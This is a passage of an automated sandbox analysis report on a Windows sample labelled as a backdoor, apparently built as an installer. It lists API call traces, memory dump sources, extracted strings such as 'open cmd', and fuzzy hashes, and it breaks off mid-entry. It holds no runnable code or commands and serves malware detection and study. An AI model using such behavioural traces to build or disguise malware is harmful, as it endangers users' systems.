                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404723
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404731
                                                      • lstrlenW.KERNEL32(?), ref: 00404736
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404743
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404758
                                                      • GetDlgItem.USER32(?,0000040A), ref: 004047B1
                                                      • SendMessageW.USER32(00000000), ref: 004047B8
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004047E3
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404826
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404834
                                                      • SetCursor.USER32(00000000), ref: 00404837
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404850
                                                      • SetCursor.USER32(00000000), ref: 00404853
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404882
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404894
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                      • String ID: N$open cmd
                                                      • API String ID: 3103080414-1465111519
                                                      • Opcode ID: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                                                      • Instruction ID: dae4caa8b62e847b2ebc6bc8f7d7cc953444b28573a7dbce8249495b0b2e45c9
                                                      • Opcode Fuzzy Hash: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                                                      • Instruction Fuzzy Hash: 5361A0B6900609BFDB10AF60DD85E6A7B69FB85314F00C43AF605B62D0C77CA961CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062FB,?,?), ref: 0040619B
                                                      • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061A4
                                                        • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                                                        • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                                                      • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 004061C1
                                                      • wsprintfA.USER32 ref: 004061DF
                                                      • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406229
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
                                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
                                                      • GlobalFree.KERNEL32(00000000), ref: 004062C8
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062CF
                                                        • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                                                        • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                      • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                                      • API String ID: 2171350718-2304911260
                                                      • Opcode ID: 2d35bf13d1375d3c6da66062a6a01f46b6474b78dcc5aa161486fb580ec27b69
                                                      • Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
                                                      • Opcode Fuzzy Hash: 2d35bf13d1375d3c6da66062a6a01f46b6474b78dcc5aa161486fb580ec27b69
                                                      • Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                                                      • Instruction ID: 94ee33a561faf14046f005448635b33146be7beb2ca28ebab25df4912e6f605d
                                                      • Opcode Fuzzy Hash: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                                                      • Instruction Fuzzy Hash: 9E417C71800209AFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB789A55DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004044FA
                                                      • GetSysColor.USER32(00000000), ref: 00404538
                                                      • SetTextColor.GDI32(?,00000000), ref: 00404544
                                                      • SetBkMode.GDI32(?,?), ref: 00404550
                                                      • GetSysColor.USER32(?), ref: 00404563
                                                      • SetBkColor.GDI32(?,?), ref: 00404573
                                                      • DeleteObject.GDI32(?), ref: 0040458D
                                                      • CreateBrushIndirect.GDI32(?), ref: 00404597
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                      • Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
                                                      • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                      • Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                        • Part of subcall function 004060EB: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406101
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                      • String ID: 9
                                                      • API String ID: 163830602-2366072709
                                                      • Opcode ID: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                                                      • Instruction ID: be08228a48e351455db253d3f5410474da148bca98ac48c4339161726040cff4
                                                      • Opcode Fuzzy Hash: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                                                      • Instruction Fuzzy Hash: 89510A75D00219AADF20EFD5CA88AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • lstrlenW.KERNEL32(007A0F28,00000000,0079DF00,771B23A0,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                                                      • lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079DF00,771B23A0,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                                                      • lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                                                      • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                                                        • Part of subcall function 00406557: lstrcatW.KERNEL32(open cmd,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                        • Part of subcall function 00406557: lstrlenW.KERNEL32(open cmd,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                      • String ID:
                                                      • API String ID: 1495540970-0
                                                      • Opcode ID: d182a1d70429bc64db553ecc4079719f7a86ed9d7a4d9c7a567f665e8b6c1191
                                                      • Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
                                                      • Opcode Fuzzy Hash: d182a1d70429bc64db553ecc4079719f7a86ed9d7a4d9c7a567f665e8b6c1191
                                                      • Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406804
                                                      • CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406813
                                                      • CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406818
                                                      • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 0040682B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 589700163-1439852002
                                                      • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                      • Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
                                                      • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                      • Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E4C
                                                      • GetMessagePos.USER32 ref: 00404E54
                                                      • ScreenToClient.USER32(?,?), ref: 00404E6E
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E80
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                      • Instruction ID: da5f2d6a974e9c572a85d9e94ff0a86548add23bfd296e24df18a92b611d7590
                                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                      • Instruction Fuzzy Hash: 2F018C71900219BADB00DBA4DD81BFEBBBCAB94710F10002BBB10B61C0C7B4AA018BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                      • MulDiv.KERNEL32(0000EA00,00000064,00A07450), ref: 00402FDC
                                                      • wsprintfW.USER32 ref: 00402FEC
                                                      • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                      Strings
                                                      • verifying installer: %d%%, xrefs: 00402FE6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: verifying installer: %d%%
                                                      • API String ID: 1451636040-82062127
                                                      • Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                                                      • Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
                                                      • Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                                                      • Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                      • GlobalFree.KERNEL32(?), ref: 00402A06
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                      • String ID:
                                                      • API String ID: 2667972263-0
                                                      • Opcode ID: f9228c852270c76ef78ec2ca11ee776aa8e2f0e6cd55c43c8e62e95c72d82e91
